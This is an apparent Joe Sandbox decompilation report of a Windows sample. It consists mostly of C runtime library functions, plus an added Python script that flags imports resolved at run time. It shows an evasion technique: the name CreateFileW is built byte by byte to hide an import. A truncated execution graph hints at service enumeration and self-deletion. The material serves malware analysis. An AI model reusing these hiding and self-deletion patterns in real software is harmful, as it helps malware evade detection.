			E0040159B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);                                          /* 0x0040159b */
				_push(0x40df20);                                     /* 0x0040159d  scope table for the SEH frame */
				_t8 = E004028CC(__ebx, __edi, __esi);                /* 0x004015a2  SEH prologue */
				_t23 =  *((intOrPtr*)(_t25 + 8));                    /* 0x004015a7  block to free (first argument) */
				if(_t23 == 0) {                                      /* 0x004015ac  free(NULL) is a no-op */
					L9:                                              /* 0x00401623 */
					return E00402911(_t8);                           /* 0x00401628  SEH epilogue */
				}                                                    /* 0x00401628 */
				if( *0x4111cc != 3) {                                /* 0x004015b5  not the small-block heap */
					_push(_t23);                                     /* 0x004015fa */
					L7:                                              /* 0x004015fb */
					_t8 = HeapFree( *0x4103b4, 0, ??);               /* 0x00401603  HeapFree(_crtheap, 0, block) */
					_t31 = _t8;                                      /* 0x00401609 */
					if(_t8 == 0) {                                   /* 0x0040160b */
						_t10 = E00401B5B(_t31);                      /* 0x0040160d  errno slot */
						 *_t10 = E00401B20(GetLastError());          /* 0x00401620  errno = mapped Win32 error */
					}                                                /* 0x00401622 */
					goto L9;
				}                                                    /* 0x0040160b */
				E00401D99(4);                                        /* 0x004015b9  __lock(4): heap lock */
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;            /* 0x004015bf  enter __try scope 0 */
				_t13 = E00401E12(_t23);                              /* 0x004015c4  ___sbh_find_block */
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;                 /* 0x004015ca */
				if(_t13 != 0) {                                      /* 0x004015cf  block belongs to the small-block heap */
					_push(_t23);                                     /* 0x004015d1 */
					_push(_t13);                                     /* 0x004015d2 */
					E00401E3D();                                     /* 0x004015d3  ___sbh_free_block */
				}                                                    /* 0x004015d9 */
				 *(_t25 - 4) = 0xfffffffe;                           /* 0x004015da  leave __try scope */
				_t8 = E004015F1();                                   /* 0x004015e1  __finally handler (releases the lock) */
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {              /* 0x004015ea */
					goto L9;
				} else {                                             /* 0x004015ec */
					_push( *((intOrPtr*)(_t25 + 8)));                /* 0x004015ec  not found in the SBH: fall back to HeapFree */
					goto L7;
				}                                                    /* 0x004015ec */
			}

                                                            APIs
                                                            • __lock.LIBCMT ref: 004015B9
                                                              • Part of subcall function 00401D99: __mtinitlocknum.LIBCMT ref: 00401DAD
                                                              • Part of subcall function 00401D99: __amsg_exit.LIBCMT ref: 00401DB9
                                                              • Part of subcall function 00401D99: EnterCriticalSection.KERNEL32(?,?,?,00405A5C,00000004,0040E128,0000000C,00403565,?,?,00000000,00000000,00000000,00403207,00000001,00000214), ref: 00401DC1
                                                            • ___sbh_find_block.LIBCMT ref: 004015C4
                                                            • ___sbh_free_block.LIBCMT ref: 004015D3
                                                            • HeapFree.KERNEL32(00000000,?,0040DF20,0000000C,0040100C,?), ref: 00401603
                                                            • GetLastError.KERNEL32(?,?,?,0040DF20,0000000C,0040100C,?), ref: 00401614
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2714421763-0
                                                            • Opcode ID: 715825a031288f099a094aa5f0a8570a65f21abb85a35e0d1b48caedcea89e37
                                                            • Instruction ID: 41f52afbf4e112d9fb7568739c74b3c6e806d5542676bf96b3d08f156f8e2a56
                                                            • Opcode Fuzzy Hash: 715825a031288f099a094aa5f0a8570a65f21abb85a35e0d1b48caedcea89e37
                                                            • Instruction Fuzzy Hash: 5E014F71901602EADB207BA29D0AB5E3B64AF40368F24453FF5057A1E1DB7C99409A9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
			/* Processor-feature probe. When KERNEL32 exports IsProcessorFeaturePresent it is
			   called with 0, i.e. PF_FLOATING_POINT_PRECISION_ERRATA (the Pentium FDIV erratum),
			   and its result is returned; the call eax between the push and the return is not
			   rendered by the decompiler. On systems without that export the code falls back to
			   x87 arithmetic: x / y * y is formed from two constants at 0x40dbf0 / 0x40dbf8,
			   subtracted from x (fsubr) and the difference compared with 1.0 (fld1/fcomp), then
			   the x87 condition bits from fnstsw decide the result. This is the shape of the
			   MSVC CRT's FDIV-bug check; the decompiler emits the x87 sequence out of order and
			   reuses _t8 for the status word. Trailing comments give each line's address. */
			E00408920() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");                                 /* 0x00408925 */
				if(_t8 == 0) {                                                      /* 0x0040892d */
					L6:                                                             /* 0x00408944  jumps back to the chunk at 0x4088f0 */
					_v20 =  *0x40dbf8;                                              /* 0x004088f0  y */
					_v28 =  *0x40dbf0;                                              /* 0x004088f9  x */
					asm("fsubr qword [ebp-0x18]");                                  /* 0x00408905  x - (x / y * y) */
					_v12 = _v28 / _v20 * _v20;                                      /* 0x00408908  store into _v12 */
					asm("fld1");                                                    /* 0x0040890b */
					asm("fcomp qword [ebp-0x8]");                                   /* 0x0040890d  compare 1.0 with _v12 */
					asm("fnstsw ax");                                               /* 0x00408910 */
					if((_t8 & 0x00000005) != 0) {                                   /* 0x00408915  x87 condition bits */
						return 0;                                                   /* 0x0040891f */
					} else {                                                        /* 0x00408917 */
						return 1;                                                   /* 0x0040891b */
					}                                                               /* 0x0040891b */
				} else {                                                            /* 0x0040892f */
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");     /* 0x00408935 */
					if(__eax == 0) {                                                /* 0x0040893d */
						goto L6;
					} else {                                                        /* 0x0040893f */
						_push(0);                                                   /* 0x0040893f  PF_FLOATING_POINT_PRECISION_ERRATA */
						return __eax;                                               /* 0x00408943  result of IsProcessorFeaturePresent(0) */
					}                                                               /* 0x00408943 */
				}                                                                   /* 0x0040893d */
			}

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00407C9E), ref: 00408925
                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408935
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                            • API String ID: 1646373207-3105848591
                                                            • Opcode ID: 75dafc7f45e323bb5b769500b5312da08f43c9aa8a7900d91081934756ca8dc5
                                                            • Instruction ID: 605c781860af894325431a5166e568f4fbe082905a4f86ec8b28f6043db036c2
                                                            • Opcode Fuzzy Hash: 75dafc7f45e323bb5b769500b5312da08f43c9aa8a7900d91081934756ca8dc5
                                                            • Instruction Fuzzy Hash: 0FC012A0B89200E2EA902BF11F49F3626082B44B0AF24423AB049F01C0CEB8C004E02E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
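
Across the entries above, the CRT's thread-data setup resolves FlsAlloc, FlsGetValue, FlsSetValue and FlsFree by name, and E00408920 resolves IsProcessorFeaturePresent the same way, so none of those names appears in the static import table; only the APIs block of each function entry records them. The script below is an added example for this page, not Joe Sandbox or sample code: it parses function entries in the plain-text form shown here (the "C-Code - Quality" header, the signature line, the APIs bullets with their "Part of subcall function" attributions, and the Similarity bullets), separates a function's own calls from those attributed to callees, and lists the names each function passes to GetProcAddress. The embedded SAMPLE is copied from the E0040159B and E00408920 entries with the decompiled bodies left out; parse_entries, direct_api_names, resolved_names and triage are the example's own names.

```python
"""Parse the per-function "APIs" listings that the Joe Sandbox IDA plugin exports (the
plain-text form on this page) and flag imports the sample resolves at run time through
GetProcAddress. Added example for this report, not Joe Sandbox or sample code. SAMPLE is
copied from the entries for E0040159B and E00408920 above, decompiled bodies left out."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
C-Code - Quality: 39%
\t\t\tE0040159B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
\t\t\t}
APIs
• __lock.LIBCMT ref: 004015B9
  • Part of subcall function 00401D99: EnterCriticalSection.KERNEL32(?,?,?,00405A5C,00000004,0040E128,0000000C,00403565,?,?,00000000,00000000,00000000,00403207,00000001,00000214), ref: 00401DC1
• ___sbh_find_block.LIBCMT ref: 004015C4
• HeapFree.KERNEL32(00000000,?,0040DF20,0000000C,0040100C,?), ref: 00401603
• GetLastError.KERNEL32(?,?,?,0040DF20,0000000C,0040100C,?), ref: 00401614
C-Code - Quality: 65%
\t\t\tE00408920() {
\t\t\t}
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,00407C9E), ref: 00408925
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408935
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
"""

QUALITY = re.compile(r"^C-Code - Quality: (\d+)%$")
SIGNATURE = re.compile(r"\b(E[0-9A-F]{8})\s*\(")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"}
# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: XXXXXXXX"
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<via>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref: (?P<ref>[0-9A-F]{8})$")
SIM_LINE = re.compile(r"^•\s*(API String ID|API ID|String ID):\s*(.*)$")
HEXWORD = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                 # call-site address from the "ref:" field
    via_subcall: str = None  # callee address when the report attributes the call to a subcall


@dataclass
class FunctionEntry:
    name: str
    quality: int
    calls: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # "API ID", "String ID", "API String ID"


def parse_entries(text):
    """Split the listing into one FunctionEntry per "C-Code - Quality" block."""
    entries, current, section, want_signature = [], None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if q := QUALITY.match(line):
            current = FunctionEntry(name="", quality=int(q.group(1)))
            entries.append(current)
            section, want_signature = "code", True
        elif current is None or not line:
            continue
        elif want_signature:  # first non-blank line after the header is the signature
            m = SIGNATURE.search(line)
            current.name = m.group(1) if m else line
            want_signature = False
        elif line in SECTION_HEADERS:
            section = line
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = m.group("args")
            current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                         [a.strip() for a in args.split(",")] if args else [],
                                         m.group("ref"), m.group("via")))
        elif section == "Similarity" and (m := SIM_LINE.match(line)):
            current.similarity[m.group(1)] = m.group(2).strip()
    return entries


def direct_api_names(entry, module=None):
    """APIs the function calls itself; subcall attributions are excluded."""
    return {c.name for c in entry.calls
            if c.via_subcall is None and (module is None or c.module == module)}


def resolved_names(entry):
    """Literal names passed to GetProcAddress: imports resolved at run time that never
    show up in the PE import table, so import-based static triage misses them."""
    return [c.args[1] for c in entry.calls
            if c.via_subcall is None and c.name == "GetProcAddress" and len(c.args) > 1
            and c.args[1] != "?" and not HEXWORD.match(c.args[1])]


def triage(entries):
    """Function name -> run-time-resolved API names, for the functions that have any."""
    return {e.name: resolved_names(e) for e in entries if resolved_names(e)}
```

Run over a whole exported listing, triage() gives the per-function list of names resolved at run time, which is where the sample's own logic tends to surface; entries whose direct calls are all CRT internals (__lock, ___sbh_find_block and the like), as in E0040159B, can be set aside as library code.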

                                                            C-Code - Quality: 68%
			/* Converts a multibyte string (_a4, _a8 bytes, or -1 for NUL-terminated) into a
			   BSTR: pass 1 of MultiByteToWideChar sizes the buffer, OLEAUT32 ordinal 4
			   (SysAllocStringLen) allocates it, pass 2 converts into it and the BSTR is
			   returned; if the second pass does not produce the expected length the BSTR is
			   released with ordinal 6 (SysFreeString) and 0 is returned. E00401020 supplies the
			   code page; E00401570/E004014C0 are a paired setup/teardown on a local.
			   Trailing comments give the instruction address of each line. */
			E00401030(char* _a4, int _a8) {
				short* _v16;
				int _v20;
				char _v28;
				int _v32;
				short* _v36;
				int _v40;
				int _v44;
				short* _v48;
				short* _t39;

				if(_a4 == 0 || _a8 == 0) {                                          /* 0x0040103a */
					return 0;
				} else {                                                            /* 0x00401049 */
					_v20 = E00401020();                                             /* 0x0040104e  code page */
					E00401570( &_v28);                                              /* 0x00401054 */
					_v36 = 0;                                                       /* 0x00401059 */
					_v32 = MultiByteToWideChar(_v20, 0, _a4, _a8, 0, 0);            /* 0x00401078  pass 1: required length in wide chars */
					_t39 = _v32;                                                    /* 0x0040107b */
					_v16 = _t39;                                                    /* 0x0040107e */
					if(_a8 == 0xffffffff) {                                         /* 0x00401085  -1: the count includes the NUL */
						_v16 = _v16 - 1;                                            /* 0x0040108d */
					}                                                               /* 0x0040108d */
					__imp__#4(0, _v16);                                             /* 0x00401096  SysAllocStringLen(NULL, len) */
					_v36 = _t39;                                                    /* 0x0040109c  decompiler reuses _t39 for the new BSTR */
					if(_v36 == 0) {                                                 /* 0x004010a3  allocation failed: return 0 */
						L8:                                                         /* 0x004010ea */
						_v48 = _v36;                                                /* 0x004010ed */
						E004014C0( &_v28);                                          /* 0x004010f3 */
						return _v48;
					} else {                                                        /* 0x004010a5 */
						_v40 = MultiByteToWideChar(_v20, 0, _a4, _a8, _v36, _v32);  /* 0x004010c1  pass 2: convert into the BSTR */
						if(_v40 == _v32) {                                          /* 0x004010ca */
							goto L8;
						}
						__imp__#6(_v36);                                            /* 0x004010d0  SysFreeString on length mismatch */
						_v44 = 0;                                                   /* 0x004010d6 */
						E004014C0( &_v28);                                          /* 0x004010e0 */
						return _v44;
					}                                                               /* 0x004010e5 */
				}                                                                   /* 0x004010a3 */
			}

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,00000000,00000000), ref: 00401072
                                                            • SysAllocStringLen.OLEAUT32(00000000,000000FF), ref: 00401096
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,?), ref: 004010BB
                                                            • SysFreeString.OLEAUT32(00000000), ref: 004010D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiStringWide$AllocFree
                                                            • String ID:
                                                            • API String ID: 447844807-0
                                                            • Opcode ID: 2bec2e3abdc9887048b051c05daded1fd39536edc123c76721433bea13e66d55
                                                            • Instruction ID: 1cd42949e467d549a5b563eba143ca2e91b2afb32e3a91e5961ec4af91c2d553
                                                            • Opcode Fuzzy Hash: 2bec2e3abdc9887048b051c05daded1fd39536edc123c76721433bea13e66d55
                                                            • Instruction Fuzzy Hash: 9221C875E00208EFCB04DFA5C895BEEB7B4BB48304F108229E515BB290D739A941CFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00408814(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                            				intOrPtr _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            
                                                            				_t28 = __ebx;
                                                            				_t25 = _a16;
                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                            					_t26 = E00408111(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            					goto L9;
                                                            				} else {
                                                            					_t35 = _t25 - 0x66;
                                                            					if(_t25 != 0x66) {
                                                            						__eflags = _t25 - 0x61;
                                                            						if(_t25 == 0x61) {
                                                            							L7:
                                                            							_t26 = E004081FD(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            						} else {
                                                            							__eflags = _t25 - 0x41;
                                                            							if(__eflags == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								_t26 = E0040871C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            							}
                                                            						}
                                                            						L9:
                                                            						return _t26;
                                                            					} else {
                                                            						return E00408663(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                            • Instruction ID: d1277c688e6782a7d6667dfe5775cee7c43dcd1ef85adbacd88dac02ee4583fb
                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                            • Instruction Fuzzy Hash: 25018733000149FBCF126E85CD05CEE3F22BF08344B58846AFA9868171DB3AC971AB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004053C6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t15;
                                                            				LONG* _t21;
                                                            				long _t23;
                                                            				void* _t31;
                                                            				LONG* _t33;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            
                                                            				_t35 = __eflags;
                                                            				_t29 = __edx;
                                                            				_t25 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40e0c8);
                                                            				E004028CC(__ebx, __edi, __esi);
                                                            				_t31 = E00403255(__edx, __edi, _t35);
                                                            				_t15 =  *0x40fb8c; // 0xfffffffe
                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                            					E00401D99(0xd);
                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                            					_t33 =  *(_t31 + 0x68);
                                                            					 *(_t34 - 0x1c) = _t33;
                                                            					__eflags = _t33 -  *0x40f960; // 0x21e2870
                                                            					if(__eflags != 0) {
                                                            						__eflags = _t33;
                                                            						if(_t33 != 0) {
                                                            							_t23 = InterlockedDecrement(_t33);
                                                            							__eflags = _t23;
                                                            							if(_t23 == 0) {
                                                            								__eflags = _t33 - 0x40f538;
                                                            								if(__eflags != 0) {
                                                            									_push(_t33);
                                                            									E0040159B(_t25, _t31, _t33, __eflags);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t21 =  *0x40f960; // 0x21e2870
                                                            						 *(_t31 + 0x68) = _t21;
                                                            						_t33 =  *0x40f960; // 0x21e2870
                                                            						 *(_t34 - 0x1c) = _t33;
                                                            						InterlockedIncrement(_t33);
                                                            					}
                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                            					E00405461();
                                                            				} else {
                                                            					_t33 =  *(_t31 + 0x68);
                                                            				}
                                                            				if(_t33 == 0) {
                                                            					E00403688(_t25, _t29, _t31, 0x20);
                                                            				}
                                                            				return E00402911(_t33);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00403255: __getptd_noexit.LIBCMT ref: 00403256
                                                              • Part of subcall function 00403255: __amsg_exit.LIBCMT ref: 00403263
                                                            • __amsg_exit.LIBCMT ref: 004053F2
                                                            • __lock.LIBCMT ref: 00405402
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040541F
                                                            • InterlockedIncrement.KERNEL32(021E2870), ref: 0040544A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 2880340415-0
                                                            • Opcode ID: ad94bfbd25163ef528c88e08bbaf6c660ca8bd0c56b4544586975f52f2db6a12
                                                            • Instruction ID: 6de90fe8c58894b7ca0e5e06b5ae9b991f0c7d2b854e111021797f1a9afa1a73
                                                            • Opcode Fuzzy Hash: ad94bfbd25163ef528c88e08bbaf6c660ca8bd0c56b4544586975f52f2db6a12
                                                            • Instruction Fuzzy Hash: 2B018E31902B11ABD720AB66984579B7760FB04716F50413BF804777E1C73C6981CFAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0040B1B0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, char _a4) {
                                                            				signed int _v8;
                                                            				char _v9;
                                                            				char _v10;
                                                            				char _v11;
                                                            				char _v12;
                                                            				char _v13;
                                                            				char _v14;
                                                            				char _v15;
                                                            				char _v16;
                                                            				char _v17;
                                                            				char _v18;
                                                            				char _v19;
                                                            				char _v20;
                                                            				_Unknown_base(*)()* _v24;
                                                            				signed int _t19;
                                                            				intOrPtr _t30;
                                                            				signed int _t33;
                                                            
                                                            				_t30 = __edx;
                                                            				_t19 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t19 ^ _t33;
                                                            				_v20 = 0x43;
                                                            				_v19 = 0x72;
                                                            				_v18 = 0x65;
                                                            				_v17 = 0x61;
                                                            				_v16 = 0x74;
                                                            				_v15 = 0x65;
                                                            				_v14 = 0x46;
                                                            				_v13 = 0x69;
                                                            				_v12 = 0x6c;
                                                            				_v11 = 0x65;
                                                            				_v10 = 0x57;
                                                            				_v9 = 0;
                                                            				_t14 =  &_v20; // 0x43
                                                            				_v24 = GetProcAddress(E0040B090(), _t14);
                                                            				_t16 =  &_a4; // 0x6c
                                                            				return E0040158C(_v24(0x40000000, 0, 0, 2, 0x80, 0), __ebx, _v8 ^ _t33, _t30, __edi, __esi,  *_t16);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0040B090: LoadLibraryA.KERNEL32(kernel32), ref: 0040B0C8
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 0040B1FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: CreateFileW$leW
                                                            • API String ID: 2574300362-2707618114
                                                            • Opcode ID: eb6e9f9a7f4b3ede8529b64f9fd584413d512e880886245fed96f70147fb1347
                                                            • Instruction ID: df7c4cf5ca23e89ccf356df2aebacb87d13a6769653d520ceff2dbdc8efae345
                                                            • Opcode Fuzzy Hash: eb6e9f9a7f4b3ede8529b64f9fd584413d512e880886245fed96f70147fb1347
                                                            • Instruction Fuzzy Hash: 4B012160D083C8EAEB11D7E8C809B9EBFA55B15708F0480D895847B2C2D6BA5718C77A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:2.1%
                                                            Dynamic/Decrypted Code Coverage:99.8%
                                                            Signature Coverage:21.6%
                                                            Total number of Nodes:509
                                                            Total number of Limit Nodes:25
PathFileExistsW 21040->21043 21044 464c31e ___scrt_fastfail 21041->21044 21045 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21042->21045 21043->21042 21043->21044 21110 4646fc0 21044->21110 21046 464c458 21045->21046 21046->21013 21048 464c33f 21049 464c345 21048->21049 21050 464c35b 21048->21050 21052 4646c70 15 API calls 21049->21052 21125 4646c70 21050->21125 21054 464c34c 21052->21054 21053 464c359 21139 4645960 LoadLibraryA GetProcAddress 21053->21139 21182 4646df0 6 API calls 21054->21182 21059 464c38e 21059->21042 21159 46496b0 21059->21159 21061 464c3b2 21167 46494d0 21061->21167 21063 464c3c5 21064 464c3df 21063->21064 21183 46378b0 12 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21063->21183 21066 46494d0 15 API calls 21064->21066 21067 464c3e9 21066->21067 21068 464c403 21067->21068 21184 46378b0 12 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21067->21184 21070 464bd60 62 API calls 21068->21070 21071 464c40c 21070->21071 21072 464c410 21071->21072 21073 464c431 VirtualFree DeleteFileW 21071->21073 21074 464c41c Sleep 21072->21074 21076 464c430 21072->21076 21073->21042 21075 464bd60 62 API calls 21074->21075 21075->21072 21076->21073 21077->21018 21079 465dea0 ___scrt_fastfail 21078->21079 21080 464bdac OpenSCManagerW 21079->21080 21081 464bdd9 EnumServicesStatusExW 21080->21081 21082 464bdca 21080->21082 21084 464be27 LocalAlloc 21081->21084 21085 464be0e CloseServiceHandle 21081->21085 21083 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21082->21083 21088 464bdd5 21083->21088 21086 464be40 CloseServiceHandle 21084->21086 21087 464be5f EnumServicesStatusExW 21084->21087 21089 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21085->21089 21091 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21086->21091 21092 464be95 CloseServiceHandle LocalFree 21087->21092 21093 464bebc LocalAlloc 21087->21093 
